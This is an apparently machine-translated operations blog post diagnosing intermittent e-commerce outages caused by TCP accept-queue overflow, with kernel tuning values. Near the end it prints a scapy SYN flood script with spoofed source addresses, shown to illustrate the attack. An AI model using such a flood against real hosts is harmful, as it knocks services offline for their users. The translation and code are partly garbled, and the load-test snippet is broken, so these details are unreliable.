Author: Liu Xiaoming, head of operation and maintenance technology of Internet company, has 10 years of experience in Internet development and operation. It has been committed to the development of operation and maintenance tools and the promotion of operation and maintenance expert services, enabling development and improving efficiency. Advertising time: finally give yourself a salt ~~ welcome to turn over my brand when you are free (Zhihu No. : Cloth Road), look at”Development operations”Column article, hope more attention and praise is to give the author the best encouragement!

Problem Description:

  1. The monitoring system found that the e-commerce site’s home page and other pages were intermittently inaccessible;
  2. Check that security protection, network traffic, and application system load are normal.
  3. After the system is restarted, the problem is resolved temporarily. However, the intermittent problem occurs again after a period of time.

At this time the problem has affected the normal business of the entire website, my heart is scared of ah, the main alarm system has no alarm, the service runs everything normally, instantaneous back sweat has come out. But still want to calm, to carefully look for clues, step by step to find the problem.

Preliminary judgment of the problem:

1. Check whether there are errors and drops in the DEV and NIC device layers

Cat /proc/net/dev and ifconfig. No exception is found at the hardware and system layers

2. Check socket overflow and socket droped. If an application processes socket overflow too slowly in accept queue, syn queue overflows the socket dropped.

Netstat -s | grep -i listen, found the SYN socket overflow and socket droped sharp increase.

3. Check sySCtl kernel parameters: backlog, Somaxconn, file-max and application backlog

In ss-lnt query, send-q takes the minimum value of the preceding parameter and finds that the number of queues exceeds the default values of port 80 and port 443

4. Check whether Selinux and NetworkManager are enabled or disabled

5. Check whether the timestap,reuse is enabled and the recycle function is enabled. If NAT is enabled, the RECYCLE function is disabled

6. Packet capture Determines whether a SYN is received and no response is received.

In-depth analysis of the problem:

Normal three-way TCP connection handshake:

  • Step 1: The client sends a SYN to the server to initiate a handshake.
  • Step 2: The server replies with SYN + ACK to the client.
  • Step 3: After receiving a SYN + ACK, the client replies with an ACK indicating that it has received a SYN + ACK from the server.

The accept queue was full when the TCP connection was established. Once again learning map flowed more and more, it is clear that the fully connected queue must have overflowed on server.

Then check how the OS handles the overflow:

# cat /proc/sys/net/ipv4/tcp_abort_on_overflow


Tcp_abort_on_overflow 0 means that if the full connection queue is full at step 3 of the three-way handshake, the server will throw away the ACK sent by the client.

In order to prove that the client application code exception is related to the full connection queue, I changed tcp_abort_on_overflow to 1,1, which means that in step 3, if the full connection queue is full, the server sends a reset packet to the client. Discards the handshake and the connection (which was not established on the server).

Then test and see a lot of connection reset by peer errors in the web service log exception to prove that the client error is due to this reason.

For sysctl kernel parameters: backlog, somaxconn, file-max and nginx, ss-ln is the minimum value, 128, resV -q is 129, the request was discarded. Modify and optimize the above parameters:

  • Tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 16384 net.core.somaxconn = 16384
  • Backlog =32768;

No new problems found using Python multithreaded pressure test:

import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as ex:
    for each_a_tag in soup.find_all('a'):
        except Exception as err:
            print('return error msg:'+str(err))
Copy the code

Understand the flow and queue of establishing a connection during the TCP handshake

As shown in the figure above, there are two queues: syns Queue (half-connected queue); Accept queue (full connection queue)

In the three-way handshake, after the server receives the SYN from the client, it puts the relevant information into the semi-connected queue and replies to the client with SYN + ACK. For example, the SYN flood attack occurs at this stage (detailed introduction and Demo are given below). The server receives an ACK from the client. If the full connection queue is not full, the server removes the information from the half-connection queue and places it in the full connection queue. Otherwise, the server executes the tcp_ABORT_ON_overflow instruction.

If the queue is full and tcp_ABORT_ON_overflow is 0, the server will send a SYN ack to the client after a certain period of time. If the client timeout is short, an exception will occur.

SYN Flood Flood attacks

One of the most popular forms of DoS (denial of service attacks) and DDoS (distributed denial of Service attacks) is a TCP flaw that causes the attacked server to maintain a “half-connection” with a lot of SYN_RECV state and to retry the second handshake packet by default five times, filling the TCP waiting queue. Resource exhaustion (full CPU load or insufficient memory) prevents normal business requests from connecting. SYN Flood attack in Python

from concurrent.futures import ThreadPoolExecutor from scapy.all import * def synFlood(tgt,dPort): SrcList = [' ', '', '', '] for sPort in range (1024, 65535) : index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags='S') packet = ipLayer/tcpLayer send(packet) tgt = '' print(tgt) dPort = 443 with ThreadPoolExecutor(10000000) as ex: try: ex.submit(synFlood(tgt,dPort)) except Exception as err: print('return error msg:' + str(err))Copy the code

So everyone to TCP connection queue and the connection queue problems easily overlooked, but essential, especially for some short connection application problems, after the outbreak of easier, from network traffic, CPU, thread, load is normal, the client look at rt is higher, and it’s short but judging from the server-side log rt. How to avoid being in a hurry when there is a problem, establish an emergency machine mechanism, and then have the opportunity to write an emergency article.

Article recommendation:

Sermon: Bug caused accidents, should be held responsible?